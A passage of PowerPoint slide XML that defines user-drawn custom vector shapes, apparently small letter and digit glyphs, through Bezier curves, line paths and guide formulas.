                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="2"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="10" y="1"/>
                        <a:pt x="10" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="11" y="2"/>
                        <a:pt x="11" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="2"/>
                        <a:pt x="12" y="1"/>
                        <a:pt x="13" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="0"/>
                        <a:pt x="15" y="0"/>
                        <a:pt x="16" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="0"/>
                        <a:pt x="18" y="0"/>
                        <a:pt x="18" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="1"/>
                        <a:pt x="20" y="2"/>
                        <a:pt x="20" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="4"/>
                        <a:pt x="20" y="5"/>
                        <a:pt x="20" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="14"/>
                        <a:pt x="20" y="14"/>
                        <a:pt x="20" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="14"/>
                        <a:pt x="19" y="14"/>
                        <a:pt x="19" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="6"/>
                        <a:pt x="19" y="6"/>
                        <a:pt x="19" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="5"/>
                        <a:pt x="19" y="4"/>
                        <a:pt x="18" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="3"/>
                        <a:pt x="18" y="3"/>
                        <a:pt x="17" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="16" y="2"/>
                        <a:pt x="16" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="2"/>
                        <a:pt x="14" y="2"/>
                        <a:pt x="13" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="12" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="5"/>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="14"/>
                        <a:pt x="11" y="14"/>
                        <a:pt x="11" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="14"/>
                        <a:pt x="10" y="14"/>
                        <a:pt x="10" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="7"/>
                        <a:pt x="10" y="7"/>
                        <a:pt x="10" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="5"/>
                        <a:pt x="9" y="4"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="3"/>
                        <a:pt x="9" y="3"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="2"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="5"/>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="14"/>
                        <a:pt x="2" y="14"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="14"/>
                        <a:pt x="0" y="14"/>
                        <a:pt x="0" y="14"/>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51"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8782050" y="4240213"/>
                  <a:ext cx="31750" cy="44450"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 14"/>
                    <a:gd name="T1" fmla="*/ 0 h 19"/>
                    <a:gd name="T2" fmla="*/ 2 w 14"/>
                    <a:gd name="T3" fmla="*/ 0 h 19"/>
                    <a:gd name="T4" fmla="*/ 2 w 14"/>
                    <a:gd name="T5" fmla="*/ 3 h 19"/>
                    <a:gd name="T6" fmla="*/ 4 w 14"/>
                    <a:gd name="T7" fmla="*/ 1 h 19"/>
                    <a:gd name="T8" fmla="*/ 7 w 14"/>
                    <a:gd name="T9" fmla="*/ 0 h 19"/>
                    <a:gd name="T10" fmla="*/ 12 w 14"/>
                    <a:gd name="T11" fmla="*/ 2 h 19"/>
                    <a:gd name="T12" fmla="*/ 14 w 14"/>
                    <a:gd name="T13" fmla="*/ 7 h 19"/>
                    <a:gd name="T14" fmla="*/ 12 w 14"/>
                    <a:gd name="T15" fmla="*/ 12 h 19"/>
                    <a:gd name="T16" fmla="*/ 7 w 14"/>
                    <a:gd name="T17" fmla="*/ 14 h 19"/>
                    <a:gd name="T18" fmla="*/ 4 w 14"/>
                    <a:gd name="T19" fmla="*/ 13 h 19"/>
                    <a:gd name="T20" fmla="*/ 2 w 14"/>
                    <a:gd name="T21" fmla="*/ 11 h 19"/>
                    <a:gd name="T22" fmla="*/ 2 w 14"/>
                    <a:gd name="T23" fmla="*/ 19 h 19"/>
                    <a:gd name="T24" fmla="*/ 0 w 14"/>
                    <a:gd name="T25" fmla="*/ 19 h 19"/>
                    <a:gd name="T26" fmla="*/ 0 w 14"/>
                    <a:gd name="T27" fmla="*/ 0 h 19"/>
                    <a:gd name="T28" fmla="*/ 7 w 14"/>
                    <a:gd name="T29" fmla="*/ 2 h 19"/>
                    <a:gd name="T30" fmla="*/ 3 w 14"/>
                    <a:gd name="T31" fmla="*/ 3 h 19"/>
                    <a:gd name="T32" fmla="*/ 2 w 14"/>
                    <a:gd name="T33" fmla="*/ 7 h 19"/>
                    <a:gd name="T34" fmla="*/ 2 w 14"/>
                    <a:gd name="T35" fmla="*/ 10 h 19"/>
                    <a:gd name="T36" fmla="*/ 4 w 14"/>
                    <a:gd name="T37" fmla="*/ 12 h 19"/>
                    <a:gd name="T38" fmla="*/ 7 w 14"/>
                    <a:gd name="T39" fmla="*/ 12 h 19"/>
                    <a:gd name="T40" fmla="*/ 9 w 14"/>
                    <a:gd name="T41" fmla="*/ 12 h 19"/>
                    <a:gd name="T42" fmla="*/ 11 w 14"/>
                    <a:gd name="T43" fmla="*/ 10 h 19"/>
                    <a:gd name="T44" fmla="*/ 12 w 14"/>
                    <a:gd name="T45" fmla="*/ 7 h 19"/>
                    <a:gd name="T46" fmla="*/ 11 w 14"/>
                    <a:gd name="T47" fmla="*/ 4 h 19"/>
                    <a:gd name="T48" fmla="*/ 9 w 14"/>
                    <a:gd name="T49" fmla="*/ 2 h 19"/>
                    <a:gd name="T50" fmla="*/ 7 w 14"/>
                    <a:gd name="T51"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 h="19">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="0"/>
                        <a:pt x="10" y="1"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="14" y="5"/>
                        <a:pt x="14" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="9"/>
                        <a:pt x="13" y="11"/>
                        <a:pt x="12" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="13"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="14"/>
                        <a:pt x="5" y="14"/>
                        <a:pt x="4" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="13"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="19"/>
                        <a:pt x="2" y="19"/>
                        <a:pt x="2" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="19"/>
                        <a:pt x="0" y="19"/>
                        <a:pt x="0" y="19"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="7" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="3" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="4"/>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="8"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="11"/>
                        <a:pt x="3" y="11"/>
                        <a:pt x="4" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="12"/>
                        <a:pt x="6" y="12"/>
                        <a:pt x="7" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="9" y="12"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="11"/>
                        <a:pt x="11" y="11"/>
                        <a:pt x="11" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="9"/>
                        <a:pt x="12" y="8"/>
                        <a:pt x="12" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="6"/>
                        <a:pt x="12" y="5"/>
                        <a:pt x="11" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="4"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="2"/>
                        <a:pt x="8" y="2"/>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352"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8821738" y="4229101"/>
                  <a:ext cx="1588"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53"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8829675" y="4240213"/>
                  <a:ext cx="33338" cy="31750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 14"/>
                    <a:gd name="T1" fmla="*/ 9 h 14"/>
                    <a:gd name="T2" fmla="*/ 14 w 14"/>
                    <a:gd name="T3" fmla="*/ 10 h 14"/>
                    <a:gd name="T4" fmla="*/ 12 w 14"/>
                    <a:gd name="T5" fmla="*/ 12 h 14"/>
                    <a:gd name="T6" fmla="*/ 10 w 14"/>
                    <a:gd name="T7" fmla="*/ 14 h 14"/>
                    <a:gd name="T8" fmla="*/ 7 w 14"/>
                    <a:gd name="T9" fmla="*/ 14 h 14"/>
                    <a:gd name="T10" fmla="*/ 2 w 14"/>
                    <a:gd name="T11" fmla="*/ 12 h 14"/>
                    <a:gd name="T12" fmla="*/ 0 w 14"/>
                    <a:gd name="T13" fmla="*/ 7 h 14"/>
                    <a:gd name="T14" fmla="*/ 2 w 14"/>
                    <a:gd name="T15" fmla="*/ 3 h 14"/>
                    <a:gd name="T16" fmla="*/ 7 w 14"/>
                    <a:gd name="T17" fmla="*/ 0 h 14"/>
                    <a:gd name="T18" fmla="*/ 13 w 14"/>
                    <a:gd name="T19" fmla="*/ 3 h 14"/>
                    <a:gd name="T20" fmla="*/ 14 w 14"/>
                    <a:gd name="T21" fmla="*/ 7 h 14"/>
                    <a:gd name="T22" fmla="*/ 2 w 14"/>
                    <a:gd name="T23" fmla="*/ 7 h 14"/>
                    <a:gd name="T24" fmla="*/ 4 w 14"/>
                    <a:gd name="T25" fmla="*/ 11 h 14"/>
                    <a:gd name="T26" fmla="*/ 7 w 14"/>
                    <a:gd name="T27" fmla="*/ 12 h 14"/>
                    <a:gd name="T28" fmla="*/ 9 w 14"/>
                    <a:gd name="T29" fmla="*/ 12 h 14"/>
                    <a:gd name="T30" fmla="*/ 11 w 14"/>
                    <a:gd name="T31" fmla="*/ 11 h 14"/>
                    <a:gd name="T32" fmla="*/ 12 w 14"/>
                    <a:gd name="T33" fmla="*/ 9 h 14"/>
                    <a:gd name="T34" fmla="*/ 12 w 14"/>
                    <a:gd name="T35" fmla="*/ 6 h 14"/>
                    <a:gd name="T36" fmla="*/ 11 w 14"/>
                    <a:gd name="T37" fmla="*/ 3 h 14"/>
                    <a:gd name="T38" fmla="*/ 9 w 14"/>
                    <a:gd name="T39" fmla="*/ 2 h 14"/>
                    <a:gd name="T40" fmla="*/ 7 w 14"/>
                    <a:gd name="T41" fmla="*/ 2 h 14"/>
                    <a:gd name="T42" fmla="*/ 4 w 14"/>
                    <a:gd name="T43" fmla="*/ 3 h 14"/>
                    <a:gd name="T44" fmla="*/ 2 w 14"/>
                    <a:gd name="T45" fmla="*/ 6 h 14"/>
                    <a:gd name="T46" fmla="*/ 12 w 14"/>
                    <a:gd name="T4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 h="14">
                      <a:moveTo>
                        <a:pt x="12" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="10"/>
                        <a:pt x="14" y="10"/>
                        <a:pt x="14" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="11"/>
                        <a:pt x="13" y="12"/>
                        <a:pt x="12" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="13"/>
                        <a:pt x="11" y="13"/>
                        <a:pt x="10" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="8" y="14"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="14"/>
                        <a:pt x="3" y="13"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="0" y="9"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="2" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="1"/>
                        <a:pt x="5" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="0"/>
                        <a:pt x="11" y="1"/>
                        <a:pt x="13" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="5"/>
                        <a:pt x="14" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="3" y="10"/>
                        <a:pt x="4" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="12"/>
                        <a:pt x="6" y="12"/>
                        <a:pt x="7" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="8" y="12"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="12"/>
                        <a:pt x="10" y="12"/>
                        <a:pt x="11" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="11"/>
                        <a:pt x="12" y="10"/>
                        <a:pt x="12" y="9"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="12" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="5"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="11" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="3"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="2"/>
                        <a:pt x="8" y="2"/>
                        <a:pt x="7" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1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354"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8864600" y="4240213"/>
                  <a:ext cx="28575" cy="31750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 18"/>
                    <a:gd name="T1" fmla="*/ 0 h 20"/>
                    <a:gd name="T2" fmla="*/ 5 w 18"/>
                    <a:gd name="T3" fmla="*/ 0 h 20"/>
                    <a:gd name="T4" fmla="*/ 9 w 18"/>
                    <a:gd name="T5" fmla="*/ 7 h 20"/>
                    <a:gd name="T6" fmla="*/ 15 w 18"/>
                    <a:gd name="T7" fmla="*/ 0 h 20"/>
                    <a:gd name="T8" fmla="*/ 18 w 18"/>
                    <a:gd name="T9" fmla="*/ 0 h 20"/>
                    <a:gd name="T10" fmla="*/ 10 w 18"/>
                    <a:gd name="T11" fmla="*/ 10 h 20"/>
                    <a:gd name="T12" fmla="*/ 18 w 18"/>
                    <a:gd name="T13" fmla="*/ 20 h 20"/>
                    <a:gd name="T14" fmla="*/ 15 w 18"/>
                    <a:gd name="T15" fmla="*/ 20 h 20"/>
                    <a:gd name="T16" fmla="*/ 9 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 20"/>
                    <a:gd name="T18" fmla="*/ 3 w 18"/>
                    <a:gd name="T19" fmla="*/ 20 h 20"/>
                    <a:gd name="T20" fmla="*/ 0 w 18"/>
                    <a:gd name="T21" fmla="*/ 20 h 20"/>
                    <a:gd name="T22" fmla="*/ 7 w 18"/>
                    <a:gd name="T23" fmla="*/ 10 h 20"/>
                    <a:gd name="T24" fmla="*/ 2 w 18"/>
                    <a:gd name="T2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0">
                      <a:moveTo>
                        <a:pt x="2" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="5" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="1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355"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8913813" y="4230688"/>
                  <a:ext cx="26988" cy="41275"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17"/>
                    <a:gd name="T1" fmla="*/ 0 h 26"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 0 h 26"/>
                    <a:gd name="T4" fmla="*/ 3 w 17"/>
                    <a:gd name="T5" fmla="*/ 26 h 26"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 25 h 26"/>
                    <a:gd name="T8" fmla="*/ 13 w 17"/>
                    <a:gd name="T9" fmla="*/ 2 h 26"/>
                    <a:gd name="T10" fmla="*/ 0 w 17"/>
                    <a:gd name="T11" fmla="*/ 2 h 26"/>
                    <a:gd name="T12" fmla="*/ 0 w 17"/>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17" h="26">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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Rectangle 356"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8943975" y="4254501"/>
                  <a:ext cx="1587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357"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8969375" y="4230688"/>
                  <a:ext cx="11113" cy="41275"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 7"/>
                    <a:gd name="T1" fmla="*/ 0 h 26"/>
                    <a:gd name="T2" fmla="*/ 7 w 7"/>
                    <a:gd name="T3" fmla="*/ 0 h 26"/>
                    <a:gd name="T4" fmla="*/ 7 w 7"/>
                    <a:gd name="T5" fmla="*/ 26 h 26"/>
                    <a:gd name="T6" fmla="*/ 4 w 7"/>
                    <a:gd name="T7" fmla="*/ 26 h 26"/>
                    <a:gd name="T8" fmla="*/ 4 w 7"/>
                    <a:gd name="T9" fmla="*/ 2 h 26"/>
                    <a:gd name="T10" fmla="*/ 0 w 7"/>
                    <a:gd name="T11" fmla="*/ 2 h 26"/>
                    <a:gd name="T12" fmla="*/ 1 w 7"/>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7" h="26">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="7" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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Rectangle 358"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8994775" y="4254501"/>
                  <a:ext cx="1587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359"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9015413" y="4229101"/>
                  <a:ext cx="25400" cy="42863"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 3 w 11"/>
                    <a:gd name="T1" fmla="*/ 19 h 19"/>
                    <a:gd name="T2" fmla="*/ 2 w 11"/>
                    <a:gd name="T3" fmla="*/ 18 h 19"/>
                    <a:gd name="T4" fmla="*/ 7 w 11"/>
                    <a:gd name="T5" fmla="*/ 11 h 19"/>
                    <a:gd name="T6" fmla="*/ 5 w 11"/>
                    <a:gd name="T7" fmla="*/ 11 h 19"/>
                    <a:gd name="T8" fmla="*/ 1 w 11"/>
                    <a:gd name="T9" fmla="*/ 10 h 19"/>
                    <a:gd name="T10" fmla="*/ 0 w 11"/>
                    <a:gd name="T11" fmla="*/ 6 h 19"/>
                    <a:gd name="T12" fmla="*/ 1 w 11"/>
                    <a:gd name="T13" fmla="*/ 3 h 19"/>
                    <a:gd name="T14" fmla="*/ 3 w 11"/>
                    <a:gd name="T15" fmla="*/ 1 h 19"/>
                    <a:gd name="T16" fmla="*/ 5 w 11"/>
                    <a:gd name="T17" fmla="*/ 0 h 19"/>
                    <a:gd name="T18" fmla="*/ 8 w 11"/>
                    <a:gd name="T19" fmla="*/ 1 h 19"/>
                    <a:gd name="T20" fmla="*/ 10 w 11"/>
                    <a:gd name="T21" fmla="*/ 3 h 19"/>
                    <a:gd name="T22" fmla="*/ 11 w 11"/>
                    <a:gd name="T23" fmla="*/ 6 h 19"/>
                    <a:gd name="T24" fmla="*/ 11 w 11"/>
                    <a:gd name="T25" fmla="*/ 8 h 19"/>
                    <a:gd name="T26" fmla="*/ 9 w 11"/>
                    <a:gd name="T27" fmla="*/ 11 h 19"/>
                    <a:gd name="T28" fmla="*/ 3 w 11"/>
                    <a:gd name="T29" fmla="*/ 19 h 19"/>
                    <a:gd name="T30" fmla="*/ 5 w 11"/>
                    <a:gd name="T31" fmla="*/ 10 h 19"/>
                    <a:gd name="T32" fmla="*/ 8 w 11"/>
                    <a:gd name="T33" fmla="*/ 8 h 19"/>
                    <a:gd name="T34" fmla="*/ 9 w 11"/>
                    <a:gd name="T35" fmla="*/ 6 h 19"/>
                    <a:gd name="T36" fmla="*/ 8 w 11"/>
                    <a:gd name="T37" fmla="*/ 3 h 19"/>
                    <a:gd name="T38" fmla="*/ 5 w 11"/>
                    <a:gd name="T39" fmla="*/ 2 h 19"/>
                    <a:gd name="T40" fmla="*/ 3 w 11"/>
                    <a:gd name="T41" fmla="*/ 3 h 19"/>
                    <a:gd name="T42" fmla="*/ 2 w 11"/>
                    <a:gd name="T43" fmla="*/ 6 h 19"/>
                    <a:gd name="T44" fmla="*/ 3 w 11"/>
                    <a:gd name="T45" fmla="*/ 8 h 19"/>
                    <a:gd name="T46" fmla="*/ 5 w 11"/>
                    <a:gd name="T47"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 h="19">
                      <a:moveTo>
                        <a:pt x="3" y="19"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="18"/>
                        <a:pt x="2" y="18"/>
                        <a:pt x="2" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="11"/>
                        <a:pt x="7" y="11"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="11"/>
                        <a:pt x="6" y="11"/>
                        <a:pt x="5" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="11"/>
                        <a:pt x="2" y="11"/>
                        <a:pt x="1" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9"/>
